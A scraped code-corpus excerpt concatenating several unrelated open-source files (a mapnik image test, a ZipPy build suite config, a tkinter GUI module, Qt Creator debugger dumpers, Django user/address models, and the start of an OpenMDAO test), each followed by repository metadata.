im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 258)
im.set_pixel(1,0, 0)
im.set_pixel(1,1, 615)
offset = 255
scaling = 3.2
im2 = im.copy(mapnik.ImageType.gray32f, offset, scaling)
eq_(im2.get_pixel(0,0), 0.3125)
eq_(im2.get_pixel(0,1), 0.9375)
eq_(im2.get_pixel(1,0), -79.6875)
eq_(im2.get_pixel(1,1), 112.5)
im3 = im2.copy(mapnik.ImageType.gray16)
eq_(im3.get_pixel(0,0), 256)
eq_(im3.get_pixel(0,1), 258)
eq_(im3.get_pixel(1,0), 0)
eq_(im3.get_pixel(1,1), 615)
if __name__ == "__main__":
setup()
exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
| lgpl-2.1 | 391,526,796,492,739,460 | 30.731183 | 91 | 0.606574 | false |
wdv4758h/ZipPy | mx.zippy/suite.py | 1 | 3597 | suite = {
"mxversion" : "2.8.0",
"name" : "zippy",
"libraries" : {
"JLINE09" : {
"path" : "lib/jline-0.9.95-SNAPSHOT.jar",
"urls" : [
"http://mirrors.ibiblio.org/maven2/jline/jline/0.9.94/jline-0.9.94.jar",
],
"sha1" : "99a18e9a44834afdebc467294e1138364c207402",
},
"JYTHON" : {
"path" : "lib/jython-standalone-2.7-b3.jar",
"urls" : [
"http://repo1.maven.org/maven2/org/python/jython-standalone/2.7-b3/jython-standalone-2.7-b3.jar",
],
"sha1" : "56411f652bcf4acce8e9fb3bc7d06b4a0e926aaf",
},
"JAMM" : {
"path" : "lib/jamm-0.2.5.jar",
"urls" : [
"http://central.maven.org/maven2/com/github/stephenc/jamm/0.2.5/jamm-0.2.5.jar",
],
"sha1" : "0422d3543c01df2f1d8bd1f3064adb54fb9e93f3",
},
},
"projects" : {
"edu.uci.python.nodes" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.runtime","com.oracle.truffle.api","com.oracle.truffle.api.dsl","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"annotationProcessors" : ["com.oracle.truffle.dsl.processor"],
"workingSets" : "Truffle,Python",
},
"edu.uci.python.parser" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.profiler","edu.uci.python.builtins","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.shell" : {
"sourceDirs" : ["src"],
"dependencies" : ["JLINE09","edu.uci.python.nodes","edu.uci.python.profiler","edu.uci.python.runtime","edu.uci.python.parser","edu.uci.python.builtins",
"JYTHON","JAVA_ALLOCATION_INSTRUMENTER"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.profiler" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.builtins" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","edu.uci.python.profiler","com.oracle.truffle.api","com.oracle.truffle.api.dsl","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"annotationProcessors" : ["com.oracle.truffle.dsl.processor"],
"workingSets" : "Truffle,Python",
},
"edu.uci.python.runtime" : {
"sourceDirs" : ["src"],
"dependencies" : ["com.oracle.truffle.api","JYTHON","ASM","JAMM"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.benchmark" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","JUNIT"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.test" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","edu.uci.python.shell","JUNIT"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
},
"distributions" : {
"ZIPPY" : {
"path" : "zippy.jar",
"dependencies" : [
"edu.uci.python.shell",
],
"sourcesPath" : "zippy-sources.jar",
},
},
}
| bsd-3-clause | -1,377,687,197,379,758,300 | 32 | 162 | 0.57409 | false |
SchwarzerWolf/KSFH | modules/base.py | 1 | 4197 | #!/usr/bin/env python
""" SchwarzerWolf.cc
**************************
*date = '2017-10-30' *
*module_version = '0.0.4'*
**************************
***********************************************************************
*[KSFH - Kraftsport und Fitness Helfer] *
*Module -> './modules/base.py' *
* *
*Copyleft [2017] - [SchwarzerWolf.cc] *
*This program is free software: you can redistribute it and/or modify *
*it under the terms of the GNU General Public License as published by *
*the Free Software Foundation, either version 3 of the License, or *
*(at your option) any later version. *
* *
*This program is distributed in the hope that it will be useful, *
*but WITHOUT ANY WARRANTY; without even the implied warranty of *
*MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
*GNU General Public License for more details. *
* *
*You should have received a copy of the GNU General Public License *
*along with this program. If not, see <http://www.gnu.org/licenses/>.*
***********************************************************************
"""
# Imports
# **********************************************************************
import tkinter as tk
from modules.version import program_title, program_date, program_version
# **********************************************************************
class Base(tk.Frame):
def __init__(self, nb):
tk.Frame.__init__(self, master=nb)
# Pics :-)
self.pic_swolf = tk.PhotoImage(
file='./propaganda/schwarzerwolf_header.png')
self.pic_deb = tk.PhotoImage(
file='./propaganda/debian_100.png')
self.pic_tux = tk.PhotoImage(
file='./propaganda/tux_153.png')
self.pic_python = tk.PhotoImage(
file='./propaganda/python-powered_130.png')
# Center text
self.grid_columnconfigure(0, weight=1)
self.configure(background='#000000')
# Modules
self.gui()
def gui(self):
""" Starts all gui methods.
:return:
"""
self.gui_main()
self.gui_propaganda()
def gui_main(self):
""" The main gui.
Contains everything that is not in a frame (except the frames
themselves).
:return:
"""
title = tk.Label(master=self,
text=program_title,
font=('Helvetica', 18),
bg='#000000',
fg='#ffffff',
pady=15)
proginfo = tk.Label(master=self,
font=('Helvetica', 11),
bg='#000000',
fg='#ffffff',
text='Version: {version}\n{date}'.format(
version=program_version,
date=program_date))
schwarzerwolf = tk.Label(master=self,
bg='#000000',
image=self.pic_swolf)
title.grid(row=0)
proginfo.grid(row=1)
schwarzerwolf.grid(row=2)
def gui_propaganda(self):
""" Displays the images. """
frame_one = tk.Frame(master=self,
bg='#000000')
debian = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_deb)
tux = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_tux)
python = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_python)
# Grids
frame_one.grid(row=3)
debian.grid(row=4, sticky=tk.W)
tux.grid(row=4, padx=250)
python.grid(row=4, sticky=tk.E)
| gpl-3.0 | -7,002,189,345,975,905,000 | 33.121951 | 72 | 0.432452 | false |
Philips14171/qt-creator-opensource-src-4.2.1 | share/qtcreator/debugger/creatortypes.py | 1 | 8306 | ############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
from dumper import *
def stripTypeName(value):
type = value.type
try:
type = type.target()
except:
pass
return str(type.unqualified())
def extractPointerType(d, value):
postfix = ""
while stripTypeName(value) == "CPlusPlus::PointerType":
postfix += "*"
value = d.downcast(value["_elementType"]["_type"])
try:
return readLiteral(d, value["_name"]) + postfix
except:
typeName = str(value.type.unqualified().target())
if typeName == "CPlusPlus::IntegerType":
return "int" + postfix
elif typeName == "CPlusPlus::VoidType":
return "void" + postfix
return "<unsupported>"
def readTemplateName(d, value):
name = readLiteral(d, value["_identifier"]) + "<"
args = value["_templateArguments"]
impl = args["_M_impl"]
start = impl["_M_start"]
size = impl["_M_finish"] - start
try:
d.check(0 <= size and size <= 100)
d.checkPointer(start)
for i in range(int(size)):
if i > 0:
name += ", "
name += extractPointerType(d, d.downcast(start[i]["_type"]))
except:
return "<not accessible>"
name += ">"
return name
def readLiteral(d, value):
if d.isNull(value):
return "<null>"
value = d.downcast(value)
type = value.type.unqualified()
try:
type = type.target()
except:
pass
typestr = str(type)
if typestr == "CPlusPlus::TemplateNameId":
return readTemplateName(d, value)
elif typestr == "CPlusPlus::QualifiedNameId":
return readLiteral(d, value["_base"]) + "::" + readLiteral(d, value["_name"])
try:
return d.extractBlob(value["_chars"], value["_size"]).toString()
except:
return "<unsupported>"
def dumpLiteral(d, value):
d.putValue(d.hexencode(readLiteral(d, value)), "latin1")
def qdump__Core__Id(d, value):
val = value.extractPointer()
try:
name = d.parseAndEvaluate("Core::nameForId(0x%x)" % val)
d.putSimpleCharArray(name.pointer())
except:
d.putValue(val)
d.putPlainChildren(value)
def qdump__Debugger__Internal__GdbMi(d, value):
val = d.encodeString(value["m_name"]) + "3a002000" \
+ d.encodeString(value["m_data"])
d.putValue(val, "utf16")
d.putPlainChildren(value)
def qdump__Debugger__Internal__DisassemblerLine(d, value):
d.putByteArrayValue(value["m_data"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__WatchData(d, value):
d.putStringValue(value["iname"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__WatchItem(d, value):
d.putStringValue(value["iname"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__BreakpointModelId(d, value):
d.putValue("%s.%s" % (int(value["m_majorPart"]), int(value["m_minorPart"])))
d.putPlainChildren(value)
def qdump__Debugger__Internal__ThreadId(d, value):
d.putValue("%s" % value["m_id"])
d.putPlainChildren(value)
def qdump__CPlusPlus__ByteArrayRef(d, value):
d.putSimpleCharArray(value["m_start"], value["m_length"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Identifier(d, value):
d.putSimpleCharArray(value["_chars"], value["_size"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Symbol(d, value):
dumpLiteral(d, value["_name"])
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__Class(d, value):
qdump__CPlusPlus__Symbol(d, value)
def qdump__CPlusPlus__IntegerType(d, value):
d.putValue(value["_kind"])
d.putPlainChildren(value)
def qdump__CPlusPlus__FullySpecifiedType(d, value):
type = d.downcast(value["_type"])
typeName = stripTypeName(type)
if typeName == "CPlusPlus::NamedType":
dumpLiteral(d, type["_name"])
elif typeName == "CPlusPlus::PointerType":
d.putValue(d.hexencode(extractPointerType(d, type)), "latin1")
d.putPlainChildren(value)
def qdump__CPlusPlus__NamedType(d, value):
dumpLiteral(d, value["_name"])
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__PointerType(d, value):
d.putValue(d.hexencode(extractPointerType(d, value)), "latin1")
d.putPlainChildren(value)
def qdump__CPlusPlus__TemplateNameId(d, value):
dumpLiteral(d, value)
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__QualifiedNameId(d, value):
dumpLiteral(d, value)
d.putPlainChildren(value)
def qdump__CPlusPlus__Literal(d, value):
dumpLiteral(d, value)
d.putPlainChildren(value)
def qdump__CPlusPlus__StringLiteral(d, value):
d.putSimpleCharArray(value["_chars"], value["_size"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Internal__Value(d, value):
d.putValue(value["l"])
d.putPlainChildren(value)
def qdump__Utils__FileName(d, value):
d.putStringValue(value)
d.putPlainChildren(value)
def qdump__Utils__ElfSection(d, value):
d.putByteArrayValue(value["name"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Token(d, value):
k = value["f"]["kind"]
e = int(k)
type = str(k.cast(d.lookupType("CPlusPlus::Kind")))[11:] # Strip "CPlusPlus::"
try:
if e == 6:
type = readLiteral(d, value["identifier"]) + " (%s)" % type
elif e >= 7 and e <= 23:
type = readLiteral(d, value["literal"]) + " (%s)" % type
except:
pass
d.putValue(type)
d.putPlainChildren(value)
def qdump__CPlusPlus__Internal__PPToken(d, value):
data, size, alloc = d.byteArrayData(value["m_src"])
length = int(value["f"]["utf16chars"])
offset = int(value["utf16charOffset"])
#warn("size: %s, alloc: %s, offset: %s, length: %s, data: %s"
# % (size, alloc, offset, length, data))
d.putValue(d.readMemory(data + offset, min(100, length)), "latin1")
d.putPlainChildren(value)
def qdump__ProString(d, value):
try:
s = value["m_string"]
data, size, alloc = d.stringData(s)
data += 2 * int(value["m_offset"])
size = int(value["m_length"])
s = d.readMemory(data, 2 * size)
d.putValue(s, "utf16")
except:
d.putEmptyValue()
d.putPlainChildren(value)
def qdump__ProKey(d, value):
qdump__ProString(d, value)
d.putBetterType(value.type)
def qdump__Core__GeneratedFile(d, value):
d.putStringValue(value["m_d"]["d"]["path"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__Node(d, value):
d.putStringValue(value["m_filePath"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__FolderNode(d, value):
d.putStringValue(value["m_displayName"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__ProjectNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__CMakeProjectManager__Internal__CMakeProjectNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__QmakeProjectManager__QmakePriFileNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__QmakeProjectManager__QmakeProFileNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
| gpl-3.0 | -1,459,053,719,158,352,600 | 31.700787 | 85 | 0.646641 | false |
hongquan/saleor | saleor/userprofile/models.py | 1 | 6670 | from __future__ import unicode_literals
import re
from django.contrib.auth.hashers import (check_password, make_password,
is_password_usable)
from django.contrib.auth.models import BaseUserManager, PermissionsMixin
from django.db import models
from django.forms.models import model_to_dict
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.safestring import mark_safe
from django.utils.translation import pgettext_lazy
from unidecode import unidecode
from ..core.countries import COUNTRY_CHOICES
class AddressManager(models.Manager):
def as_data(self, address):
return model_to_dict(address, exclude=['id', 'user'])
def are_identical(self, addr1, addr2):
data1 = self.as_data(addr1)
data2 = self.as_data(addr2)
return data1 == data2
def store_address(self, user, address):
data = self.as_data(address)
address, created = user.addresses.get_or_create(**data)
return address
@python_2_unicode_compatible
class Address(models.Model):
first_name = models.CharField(
pgettext_lazy('Address field', 'first name'),
max_length=256)
last_name = models.CharField(
pgettext_lazy('Address field', 'last name'),
max_length=256)
company_name = models.CharField(
pgettext_lazy('Address field', 'company name'),
max_length=256, blank=True)
street_address_1 = models.CharField(
pgettext_lazy('Address field', 'street address 1'),
max_length=256)
street_address_2 = models.CharField(
pgettext_lazy('Address field', 'street address 2'),
max_length=256, blank=True)
city = models.CharField(
pgettext_lazy('Address field', 'city'),
max_length=256)
postal_code = models.CharField(
pgettext_lazy('Address field', 'postal code'),
max_length=20)
country = models.CharField(
pgettext_lazy('Address field', 'country'),
choices=COUNTRY_CHOICES, max_length=2)
country_area = models.CharField(
pgettext_lazy('Address field', 'country administrative area'),
max_length=128, blank=True)
phone = models.CharField(
pgettext_lazy('Address field', 'phone number'),
max_length=30, blank=True)
objects = AddressManager()
def __str__(self):
return '%s %s' % (self.first_name, self.last_name)
def __repr__(self):
return (
'Address(first_name=%r, last_name=%r, company_name=%r, '
'street_address_1=%r, street_address_2=%r, city=%r, '
'postal_code=%r, country=%r, country_area=%r, phone=%r)' % (
self.first_name, self.last_name, self.company_name,
self.street_address_1, self.street_address_2, self.city,
self.postal_code, self.country, self.country_area,
self.phone))
class UserManager(BaseUserManager):
def get_or_create(self, **kwargs):
defaults = kwargs.pop('defaults', {})
try:
return self.get_query_set().get(**kwargs), False
except self.model.DoesNotExist:
defaults.update(kwargs)
return self.create_user(**defaults), True
def create_user(self, email, password=None, is_staff=False,
is_active=True, **extra_fields):
'Creates a User with the given username, email and password'
email = UserManager.normalize_email(email)
user = self.model(email=email, is_active=is_active,
is_staff=is_staff, **extra_fields)
if password:
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password=None, **extra_fields):
return self.create_user(email, password, is_staff=True,
is_superuser=True, **extra_fields)
def store_address(self, user, address, billing=False, shipping=False):
entry = Address.objects.store_address(user, address)
changed = False
if billing and not user.default_billing_address_id:
user.default_billing_address = entry
changed = True
if shipping and not user.default_shipping_address_id:
user.default_shipping_address = entry
changed = True
if changed:
user.save()
@python_2_unicode_compatible
class User(PermissionsMixin, models.Model):
email = models.EmailField(unique=True)
addresses = models.ManyToManyField(Address)
is_staff = models.BooleanField(
pgettext_lazy('User field', 'staff status'),
default=False)
is_active = models.BooleanField(
pgettext_lazy('User field', 'active'),
default=False)
password = models.CharField(
pgettext_lazy('User field', 'password'),
max_length=128, editable=False)
date_joined = models.DateTimeField(
pgettext_lazy('User field', 'date joined'),
default=timezone.now, editable=False)
last_login = models.DateTimeField(
pgettext_lazy('User field', 'last login'),
default=timezone.now, editable=False)
default_shipping_address = models.ForeignKey(
Address, related_name='+', null=True, blank=True,
on_delete=models.SET_NULL,
verbose_name=pgettext_lazy('User field', 'default shipping address'))
default_billing_address = models.ForeignKey(
Address, related_name='+', null=True, blank=True,
on_delete=models.SET_NULL,
verbose_name=pgettext_lazy('User field', 'default billing address'))
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = UserManager()
def __str__(self):
return self.get_username()
def natural_key(self):
return (self.get_username(),)
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def get_username(self):
'Return the identifying username for this User'
return self.email
def is_anonymous(self):
return False
def is_authenticated(self):
return True
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
def setter(raw_password):
self.set_password(raw_password)
self.save(update_fields=['password'])
return check_password(raw_password, self.password, setter)
def set_unusable_password(self):
self.password = make_password(None)
def has_usable_password(self):
return is_password_usable(self.password)
| bsd-3-clause | 2,852,591,300,496,579,600 | 34.105263 | 77 | 0.634183 | false |
jasonmule/arbtt-swag-reporter | arbtt2xapi.py | 1 | 2536 | #!/usr/bin/env python
from __future__ import print_function
import os
from config import lrs, activity_map
from arbtt_record import ArbttRecord
from tincan import (
RemoteLRS,
Statement,
Agent,
Verb,
Activity,
ActivityDefinition,
Extensions,
Context,
LanguageMap,
)
def create_statement(arbtt_csv_entry):
"""Creates a Tincan statement from arbtt csv input"""
arbtt_record = ArbttRecord(arbtt_csv_entry)
app = arbtt_record.application
duration = arbtt_record.duration
# XXX: Look for a cleaner way to get user details
user = os.environ['LOGNAME']
email_address = "%[email protected]" % (user,)
actor = Agent(
name=user,
mbox='mailto:'+email_address,
)
verb = Verb(
id='http://adlnet.gov/expapi/verbs/interacted',
display=LanguageMap({'en-US': 'interacted'}),
)
# Get activity from config or set the activity as 'unknown'
activity_from_map = activity_map.get(app, "unknown")
object = Activity(
id=os.path.join(lrs['activities_uri'], activity_from_map),
definition=ActivityDefinition(
name=LanguageMap({'en-US': activity_from_map}),
extensions=Extensions(
{'http://id.tincanapi.com/extension/duration': duration},
),
),
)
context = Context(
platform=app
)
# Construct the statement
return Statement(
actor=actor,
verb=verb,
object=object,
context=context,
)
if __name__ == '__main__':
import fileinput
import sys
csv_entries = (l.strip() for l in fileinput.input())
remote_lrs = RemoteLRS(
endpoint=lrs['endpoint'],
# RemoteLRS uses HTTP Basic Auth
# so username, password will be sent out
# with the authorization header.
username=lrs['username'],
password=lrs['password'],
)
for csv_entry in csv_entries:
try:
statement = create_statement(csv_entry)
except ValueError, e:
# ignore invalid entries
print("Failed to create statement for %s with the error: %s"
% (csv_entry, e), file=sys.stderr)
continue
# XXX: Look out for response == None
# and possibly add the statement to a retry queue
response = remote_lrs.save_statement(statement)
if not response.success:
print("Failed to save statement for %s" % (csv_entry,))
| mit | -238,710,388,698,091,500 | 24.616162 | 73 | 0.594243 | false |
mbuhot/mbuhot-euler-solutions | python/problem-098.py | 1 | 2320 | #! /usr/bin/env python3
from collections import defaultdict
from itertools import combinations, permutations, count
from math import sqrt
description = '''
Anagramic squares
Problem 98
By replacing each of the letters in the word CARE with 1, 2, 9, and 6 respectively, we form a square number: 1296 = 362. What is remarkable is that, by using the same digital substitutions, the anagram, RACE, also forms a square number: 9216 = 962. We shall call CARE (and RACE) a square anagram word pair and specify further that leading zeroes are not permitted, neither may a different letter have the same digital value as another letter.
Using words.txt (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, find all the square anagram word pairs (a palindromic word is NOT considered to be an anagram of itself).
What is the largest square number formed by any member of such a pair?
NOTE: All anagrams formed must be contained in the given text file.
'''
def encodes(encoding, word, expected):
return all(encoding[c] == expected[i] for (i,c) in enumerate(word))
def squares(n):
for i in count(1):
sqstr = str(i*i)
if len(sqstr) < n: continue
elif len(sqstr) > n: break
else: yield sqstr
def squareEncodings(letters, word1, word2):
for sq1str in squares(len(word1)):
c2d = dict(zip(word1, sq1str))
d2c = dict(zip(sq1str, word1))
if not encodes(c2d, word1, sq1str): continue
if not encodes(d2c, sq1str, word1): continue
for sq2str in squares(len(word1)):
if encodes(c2d, word2, sq2str):
yield (c2d, int(sq1str), int(sq2str))
def squareAnagrams(anagrams):
for (letters, wordset) in anagrams.items():
print(wordset)
for (word1, word2) in combinations(wordset, 2):
for (encoding, n1, n2) in squareEncodings(letters, word1, word2):
yield(word1, word2, encoding, n1, n2)
def readAnagrams():
with open('words-98.txt', 'r') as f:
words = [w[1:-1] for w in f.read().split(',')]
anagrams = defaultdict(set)
for word in words:
key = ''.join(sorted(word))
anagrams[key].add(word)
return dict((k,v) for (k,v) in anagrams.items() if len(v) > 1)
anagrams = readAnagrams()
results = squareAnagrams(anagrams)
print(max(results, key=lambda x: max(x[3], x[4])))
| mit | 7,893,644,826,818,010,000 | 38.322034 | 442 | 0.701293 | false |
manpen/thrill | frontends/swig_python/python_rpyc.py | 4 | 1113 | #!/usr/bin/env python
##########################################################################
# frontends/swig_python/python_rpyc.py
#
# Part of Project Thrill - http://project-thrill.org
#
# Copyright (C) 2015 Timo Bingmann <[email protected]>
#
# All rights reserved. Published under the BSD-2 license in the LICENSE file.
##########################################################################
from RemoteThrill import *
# rt = RemoteThrill([["localhost", 18861]], ["localhost:1234"])
rt = RemoteThrill([["localhost", 18861], ["localhost", 18862]],
["localhost:1234", "localhost:1235"])
def genfunc(x):
print("gen", x)
return int(x + 10)
dia1 = rt.Generate(genfunc, 16)
print(dia1.AllGather())
dia2 = rt.Distribute(range(1, 100))
print("dia2.AllGather", dia2.AllGather())
print("dia2.Size", dia2.Size())
dia2pairs = dia2.Map(lambda x: [x, x])
dia3 = dia2pairs.ReduceBy(lambda x: (x[0] % 10),
lambda x, y: (x[0], x[1] + y[1]))
print("dia3.AllGather", dia3.AllGather())
##########################################################################
| bsd-2-clause | 218,308,223,493,588,000 | 28.289474 | 77 | 0.510332 | false |
gentimouton/swarch | pubsub-events/gamemanager.py | 1 | 4172 | """
Node connecting to the broker like a normal player,
except it stores an up-to-date game state by subscribing to all in-game events,
and it runs the whole game with its own tick.
"""
from __future__ import division # So to make division be float instead of int
from network import poll_for, Handler
from random import randint
import time
##################### game logic #############
TICK_DURATION = 0.05 # seconds
# game state
borders = [[0, 0, 2, 300], [0, 0, 400, 2], [398, 0, 2, 300], [0, 298, 400, 2]]
pellets = [[randint(10, 390), randint(10, 290), 5, 5] for _ in range(4)]
players = {} # map a player name to a player object
# map inputs received from clients to directions
input_dir = {'up': [0, -1], 'down': [0, 1],
'left': [-1, 0], 'right': [1, 0]}
class Player:
def __init__(self, name):
self.name = name
self.revive()
def revive(self):
self.box = [randint(10, 380), randint(10, 280), 10, 10]
self.dir = input_dir['down'] # original direction: downwards
self.speed = 2
def change_dir(self, inputt):
self.dir = input_dir[inputt]
def move(self):
self.box[0] += self.dir[0] * self.speed
self.box[1] += self.dir[1] * self.speed
def grow_and_slow(self, qty=2):
self.box[2] += qty
self.box[3] += qty
self.speed -= self.speed / 6
def collide_borders(self):
[self.revive() for border in borders if collide_boxes(self.box, border)]
def collide_other_players(self):
for p in players.values():
# only the player with lowest id of the pair detects the collision
if self.name < p.name and collide_boxes(self.box, p.box):
playerw, pw = self.box[2], p.box[2] # widths
if playerw > pw:
self.grow_and_slow(pw)
p.revive()
elif playerw < pw:
p.grow_and_slow(playerw)
self.revive()
else: # they have same width: kill both
p.revive()
self.revive()
def collide_pellets(self):
for index, pellet in enumerate(pellets):
if collide_boxes(self.box, pellet):
self.grow_and_slow()
pellets[index] = [randint(10, 390), randint(10, 290), 5, 5]
def update(self):
self.move()
self.collide_borders()
self.collide_other_players()
self.collide_pellets()
def collide_boxes(box1, box2):
x1, y1, w1, h1 = box1
x2, y2, w2, h2 = box2
return x1 < x2 + w2 and y1 < y2 + h2 and x2 < x1 + w1 and y2 < y1 + h1
################### network ##############
event_queue = [] # list of events
# events can be
class GameManager(Handler):
def on_open(self):
self.do_send(('_sub', 'join'))
self.do_send(('_sub', 'change_dir'))
def on_msg(self, data):
mtype, mdata = data
event_queue.append((mtype, mdata))
gm = GameManager('localhost', 8888) # connect asynchronously, as a node
######################### loop #######################
def apply_events():
# apply events onto game state
global event_queue
for mtype, mdata in event_queue:
if mtype == 'join' and mdata not in players:
# players should provide a unique name to identify themselves
players[mdata] = Player(mdata)
elif mtype == 'change_dir':
pname, dir = mdata
players[pname].change_dir(dir)
event_queue = []
def update_simulation():
[player.update() for player in players.values()]
def publish_state():
# Send the whole game state
serialized_players = {p.name: p.box for p in players.values()}
state = {'borders': borders,
'pellets': pellets,
'players': serialized_players}
gm.do_send(('state', state))
while 1:
loop_start = time.time()
apply_events()
update_simulation()
publish_state()
poll_for(TICK_DURATION - (time.time() - loop_start)) # poll until tick is over
| mit | 6,486,540,832,240,276,000 | 30.847328 | 83 | 0.546021 | false |
elvandy/nltools | nltools/tests/test_analysis.py | 1 | 1328 | from __future__ import division
import os
import nibabel as nb
import pandas as pd
from nltools.simulator import Simulator
from nltools.analysis import Roc
from nltools.data import Brain_Data
import matplotlib
matplotlib.use('TkAgg')
def test_roc(tmpdir):
sim = Simulator()
r = 10
sigma = .1
y = [0, 1]
n_reps = 10
# output_dir = str(tmpdir)
dat = sim.create_data(y, sigma, reps=n_reps, output_dir=None)
# dat = Brain_Data(data=sim.data, Y=sim.y)
algorithm = 'svm'
# output_dir = str(tmpdir)
# cv = {'type': 'kfolds', 'n_folds': 5, 'subject_id': sim.rep_id}
extra = {'kernel': 'linear'}
output = dat.predict(algorithm='svm', plot=False, **extra)
# Single-Interval
roc = Roc(input_values=output['yfit_all'], binary_outcome=output['Y'] == 1)
roc.calculate()
roc.summary()
assert roc.accuracy == 1
# Forced Choice
binary_outcome = output['Y'] == 1
forced_choice = list(range(int(len(binary_outcome)/2))) + list(range(int(len(binary_outcome)/2)))
forced_choice = forced_choice.sort()
roc_fc = Roc(input_values=output['yfit_all'], binary_outcome=binary_outcome, forced_choice=forced_choice)
roc_fc.calculate()
assert roc_fc.accuracy == 1
assert roc_fc.accuracy == roc_fc.auc == roc_fc.sensitivity == roc_fc.specificity
| mit | 3,994,434,864,774,681,000 | 30.619048 | 109 | 0.651355 | false |
andremilke/utility | bruteforcehttppostuser.py | 1 | 2616 | import requests
import datetime
import sys
class BruteForceService(object):
def __init__(self, _listpass, _url, _user, _quote):
self._listpass = _listpass
self._url = _url
self._user = _user
self._quote = _quote
def bruteForce(self):
fpass = open(_listpass, encoding="utf8", errors='ignore')
#try:
# with requests.Session() as s:
# gettoken = s.get(_url,timeout = 3)
#gottoken = gettoken.content.split('name="token"')[1].split('"')[1]
# print(gettoken.content)
#except requests.exceptions.RequestException as e:
# print('exception caught', e)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept-Language': 'pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache', 'Connection': 'Keep-Alive'}
start = datetime.datetime.now()
for line in fpass:
try:
passw = line.rstrip("\n")
print("Trying.. %s" % (passw))
with requests.Session() as s:
_post_data = data = {'password': passw,'login': _user}
_post_response = s.post(url=_url, data=_post_data,
headers=headers)
result = _post_response.text
if _quote not in result:
end = datetime.datetime.now()
totaltime = end - start
time = int(totaltime.total_seconds() / 60)
print("[+] Password founded %s" % (passw))
print("[+} Duration (minutes): %s" % (time))
#print(result)
break
_post_response.close()
except requests.exceptions.RequestException as e:
print('exception caught', e)
if __name__ == "__main__":
if len(sys.argv) == 5:
_listpass = sys.argv[1]
_url = sys.argv[2]
_user = sys.argv[3]
_quote = sys.argv[4]
brutehttp = BruteForceService(_listpass, _url, _user, _quote)
brutehttp.bruteForce()
else:
print("It is necessary to inform: password list, url, user and invalid quote")
| gpl-3.0 | 9,022,212,661,332,924,000 | 40.885246 | 172 | 0.487003 | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/openmdao.lib-0.13.0-py2.7.egg/openmdao/lib/drivers/test/test_newton.py | 1 | 17894 | """
Test the Newton solver
"""
import unittest
import numpy
